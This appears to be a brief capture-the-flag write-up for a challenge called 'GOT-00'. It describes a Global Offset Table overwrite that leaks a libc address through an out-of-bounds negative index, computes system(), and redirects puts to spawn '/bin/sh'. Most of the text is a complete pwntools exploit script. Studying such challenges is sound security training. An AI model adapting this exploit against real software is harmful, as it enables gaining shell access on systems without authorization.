GOT-00
OK this one is easy exploit : Overwriting Global Offset Table (GOT) it can be used even if ASLR is on
1.) leak the GOT's adress i found out that it is 60'th position above our buffer
2.) Calculate the system address
3.) Now overwrite the Got 0f puts with system address and as puts argumen is (buffer) overflow it with the string '/bin/sh'
from pwn import *
p=process("got")
print p.recvuntil("?\n")
# which buffer
p.sendline("1")
print 1
p.recvline()
# index
p.sendline("-60")
msg=p.recv(4)
msg=u32(msg)
print hex(msg)
system=msg-0x23ca0
print "[+] Target address"
print hex(system)
payload=pack(system)+"A"*72+"/bin/sh\x00"
# overwriting part which buffer
print p.recvuntil("?\n")
p.sendline("1")
p.recvline()
# index
p.sendline("-76")
# write part
print "[+] sending payload"
p.sendline(payload)
p.interactive()
#raw_input()